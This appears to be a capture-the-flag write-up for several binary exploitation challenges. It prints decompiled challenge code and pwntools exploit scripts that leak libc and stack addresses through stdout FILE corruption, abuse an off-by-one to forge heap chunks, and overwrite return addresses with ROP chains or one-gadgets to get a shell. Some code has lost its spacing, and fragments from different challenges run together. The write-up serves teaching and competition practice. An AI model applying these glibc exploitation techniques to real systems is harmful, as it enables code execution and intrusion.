v8 = __readfsqword(0x28u); puts("\nHow long is your story ?"); __isoc99_scanf("%u", &size); if ( size <= 0x27 ) { puts("Well... It seems you don't really want to talk to me that much, cya."); _exit(1337); } allocated = (char *)malloc(size); puts("What's the distortion of time and space ?"); __isoc99_scanf("%u", &offset); puts( "Well your story is quite long, time may be distored, but it is a priceless ressource, i'll give you a few words only" ", use them wisely."); read(0, &allocated[offset], 0x22uLL); puts("Everything is relative... Or is it ???"); __isoc99_scanf("%llu %llu", &wher, &wat); __isoc99_scanf("%llu %llu", &wher2, &wat2); *wher = wat; *wher2 = wat2; return0; }
but since we don’t know any address we couldn’t do anything now.
1
allocated = (char *)malloc(size);
Knowing that if size >= 0x20000, malloc will call mmap. The allocated chunk often has the address fixed with libc’s address.
Why “often”? Some distros use other kernels with many different configs, that makes fs_base and mmap have different behavior. I see sometimes the allocated chunk and fs_base have the addresses fixed with each other but not with libc.( This is self-experience so I don’t show any codes or POCs here. Believe or not is up to you).
Now we need to leak address first.
First time, I had thought that I had to overwrite stdout to leak addresses. Specially, changing first 2 bytes of stdout->_IO_write_base to \0\0 to make stdout->_IO_write_base < stdout->_IO_write_ptr.
With this way, we can leak libc addresses and program’s name on stack:
BUT since program’s name is an env variable, its address is randomize. Leaking by this way is not reliable.
So, I changed my mind. Why not changing 2 bytes of stdout->_IO_write_ptr to \xff\xff, that also makes stdout->_IO_write_base < stdout->_IO_write_ptr and we can also leak the environ (that means we can know where is the stack frame of handle function!)
Now we have libc address and saved return address of handle function. Just having to write a small rop chain to get the shell. (How luckily is that rsi=rdx=0 when the process reaches the rop chain!)
defstart(): if args.LOCAL: p = e.process() if args.GDB: gdb.attach(p, gdbscript=gs) pause() if args.DOCKER: p = remote("localhost", 5000) sleep(2) if args.GDB: pid = get_pid("/app/run") gdb.attach(pid, exe=e.path, gdbscript=gs+f"\n set sysroot /proc/{pid}/root\nfile /proc/{pid}/exe") pause()
elif args.REMOTE: # python x.py REMOTE <host> <port> host_port = sys.argv[1:] p = remote(host_port[0], int(host_port[1]), ssl=True) return p
p = start() p.sendlineafter(b'How long is your story ?\n', str(0x800000).encode()) offset = 0xa03790 p.sendlineafter(b"What's the distortion of time and space ?\n", str(offset+0x28).encode()) p.sendafter(b"Well your story is quite long, time may be distored, but it is a priceless ressource, i'll give you a few words only, use them wisely.\n", b'\xff\xff')
In function flate_string; if count+to_print > 512, the fucntion returns immediately. Take advantage of this, we can leak many addresses in flate_string.
Also in this function, v4 can be 512 before it returns. This is off-by-one bug, we can change the value of current_node ( set null byte make it smaller, so we can control the heap metadata).
I change the size of notes[1] to 0x800. Free it and allocate again.
Now notes[1] and unsortedbin are duplicated. Using notes[1] to modify unsortedbin.
Current unsortedbin has the size of 0x03e0 ( < 0x420 ).
Realized that sizeof(input) + sizeof(deflated_string) + sizeof(flated_string) = 0x480, I created 2 two fake chunk 0x420 and 0x20.
The 0x420 fake chunk will be notes[3] when calling new_note again.
Reading code and debugging libc is a pain. I don’t tell the details but only show what I changed:
Note: On the remote/docker, the sizeof stdout buffer is 0x1000 so the address of notes[1] is heap+0x16c0. If you run on local, the address is different (my local is heap+0xac0)
gs = ''' b *fprintf b *__execvpe+1426 b *__vfprintf_internal+221 '''
defstart(): if args.LOCAL: p = process([e.path], env={"LD_PRELOAD": "./hook.so"}) elif args.REMOTE: # python x.py REMOTE <host> <port> host_port = sys.argv[1:] p = remote(host_port[0], int(host_port[1])) return p
deftest_stack_address(lock, found_flag, result): # Each thread runs this function whileTrue: with lock: # Prevent multiple threads from printing/setting found_flag simultaneously if found_flag[0]: # If another thread found the result, exit return
p = start() p.sendline(b'A') sleep(0.1) # Small delay to allow process to respond
if p.poll() isNone: # Process still alive, potential success with lock: ifnot found_flag[0]: # Double-check no other thread succeeded print("[+] Found working stack address!") found_flag[0] = True result[0] = p # Store the successful process break
# Check output for specific condition (e.g., ends with b'0108') output = p.recvline(timeout=0.5)+p.recvline(timeout=0.5) with lock: print(f"Output: {output}") if output.endswith(b'0108'): print("[+] Condition met (ends with 0108)!") found_flag[0] = True result[0] = p break
p.close()
defmain(): # Shared variables for thread synchronization lock = threading.Lock() found_flag = [False] # Mutable list to share state across threads result = [None] # Store the successful process object
# Number of threads to use (adjust based on system capability and target) num_threads = 10
print(f"Starting brute-force with {num_threads} threads...")
# Use ThreadPoolExecutor to manage threads with ThreadPoolExecutor(max_workers=num_threads) as executor: # Launch threads futures = [executor.submit(test_stack_address, lock, found_flag, result) for _ inrange(num_threads)]
# Wait for all threads to complete (or one to succeed) for future in futures: future.result()
# If a working process was found, proceed with it if found_flag[0] and result[0]: p = result[0]
if args.GDB: gdb.attach(p, gdbscript=gs) pause() else: print("[-] No working stack address found.")
if __name__ == "__main__": main()
My goal is changing the return address of __vfprintf_internal. We can use 12th arg with %*c to copy 4 byte of __libc_start_call_main+120 address:
While checking many one-gadgets, I saw this gadget was unsat because the value of r12:
Noticing that __vfprintf_internal restoring r12 value on the stack, so I changed r12 value by changing this value on stack:
BUT, I have not run this explotation for the remote instance yet.
My teammate @Jalynk2004 has solved it with the other way ( Yes, he did get the flag ). By changing the fileno of FILE object, he could leak many addresses, noprint became print now!.
Firstly, thank many authors for creating many good challenges. First time I had seen the Compresse challenge, I had thought it would be a boring heap note challenge but it is actually better than that!
This time is maybe the first success of my new team.
After many mistakes and trusting wrong people in the old team, hope this time will be brighter furture!
